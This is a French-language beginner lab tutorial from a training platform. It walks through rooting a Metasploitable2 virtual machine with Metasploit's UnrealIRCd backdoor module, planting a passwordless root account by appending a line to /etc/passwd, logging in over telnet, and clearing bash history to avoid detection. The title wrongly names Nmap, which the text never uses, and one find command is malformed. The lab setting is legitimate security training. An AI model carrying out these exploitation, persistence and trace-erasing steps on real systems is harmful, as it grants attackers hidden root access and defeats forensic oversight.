Créer une porte dérobée et effacer les traces sur une machine cible avec Nmap

Beginner

Introduction

Dans ce laboratoire, nous allons apprendre à créer une porte dérobée (backdoor) et à effacer les traces après avoir réussi à accéder à une machine cible via une attaque de pénétration. Le scénario est configuré dans l'environnement LabEx, où nous utiliserons le terminal Kali pour exploiter les vulnérabilités de la machine cible Metasploitable2, obtenir l'accès root, créer une porte dérobée pour un accès ultérieur et effacer toutes les traces laissées lors du processus d'attaque.

Obtenir l'accès root sur la machine cible

Dans cette étape, nous allons utiliser la vulnérabilité Unreal Ircd pour obtenir l'accès root sur la machine cible.

Maintenant, vous allez démarrer la machine d'attaque (conteneur Kali Linux) et la machine cible (machine virtuelle Metasploitable2) pour l'expérience.

  1. Ouvrez un terminal xfce sur la machine hôte LabEx et démarrez la cible Metasploitable2 en exécutant la commande suivante :
sudo virsh start Metasploitable2

Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.

  1. Testez la connectivité à la machine cible en l'envoyant des paquets ICMP (ping) :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

  1. Lancez le conteneur Kali Linux et entrez dans l'environnement bash en exécutant :
docker run -ti --network host b5b709a49cd5 bash
  1. À l'intérieur du conteneur Kali, testez la connexion réseau à la machine cible :
ping 192.168.122.102

Appuyez sur Ctrl+C pour arrêter le ping.

Maintenant, la machine d'attaque et la machine cible sont en cours d'exécution, et vous pouvez commencer le test de pénétration.

Remarque : Si vous quittez accidentellement le bash actuel, le conteneur Kali s'arrêtera automatiquement. Vous pouvez exécuter docker run -ti --network host b5b709a49cd5 bash à nouveau sur l'hôte pour démarrer un nouveau conteneur Kali et entrer dans le bash pour continuer l'expérience.

  1. Dans le conteneur Kali Linux, entrez les commandes suivantes dans le terminal bash de Kali Linux :
service postgresql start
msfdb init
cd ~
msfconsole

Cela démarrera le service de base de données PostgreSQL, initialisera la base de données et lancera la console du Framework Metasploit (msfconsole) pour des opérations ultérieures.

  1. Recherchez le module de vulnérabilité Unreal Ircd :
search unreal_ircd
  1. Utilisez le module unix/irc/unreal_ircd_3281_backdoor :
use exploit/unix/irc/unreal_ircd_3281_backdoor
  1. Définissez l'adresse IP de la cible :
set RHOST 192.168.122.102
  1. Exploitez la vulnérabilité pour obtenir l'accès :
exploit
  1. Vérifiez l'utilisateur actuel :
whoami

Vous devriez voir que vous avez obtenu l'accès root sur la machine cible.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Créer une backdoor

Maintenant que nous avons obtenu l'accès root, créons une porte dérobée (backdoor) pour accéder ultérieurement à la machine cible.

Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :

cd ~
msfconsole

Ensuite, vérifiez les informations système :

uname -a

Trouvez l'emplacement du bash de l'utilisateur root :

cat /etc/passwd

Créez un compte de porte dérobée sans mot de passe :

echo 'shiyanlou1234::0:0::/:/bin/sh' >> /etc/passwd

Vérifiez la création du compte de porte dérobée :

cat /etc/passwd

Vous devriez voir le nouveau compte shiyanlou1234 dans la sortie.

Ouvrez un nouveau terminal et connectez-vous à la machine cible en utilisant le compte de porte dérobée :

telnet 192.168.122.102

Entrez le nom d'utilisateur shiyanlou1234 lorsque cela vous est demandé.

Vérifiez l'utilisateur actuel :

whoami

Vous devriez voir que vous êtes connecté en tant qu'utilisateur de la porte dérobée.

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Effacer les traces

Après avoir obtenu l'accès et créé une porte dérobée (backdoor), il est important d'effacer toutes les traces laissées lors du processus d'attaque pour éviter la détection.

Tout d'abord, si vous n'êtes pas dans la console Metasploit, vous devriez démarrer la console Metasploit :

cd ~
msfconsole

Une méthode courante pour effacer les traces consiste à supprimer l'historique des commandes. L'historique est stocké dans le fichier .bash_history. Vous pouvez effacer l'historique en utilisant la commande suivante :

history -c

Pour effacer le fichier .bash_history, vous pouvez trouver son emplacement en utilisant la commande find :

find / -name.bash_history

Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection

Résumé

Dans ce laboratoire, nous avons appris à obtenir l'accès root sur une machine cible en utilisant la vulnérabilité Unreal Ircd, à créer un compte de porte dérobée (backdoor) pour un accès ultérieur et à effacer les traces laissées lors du processus d'attaque. Cette expérience pratique vous aidera à comprendre les techniques utilisées par les attaquants pour maintenir un accès persistant et dissimuler leurs traces après une attaque de pénétration réussie.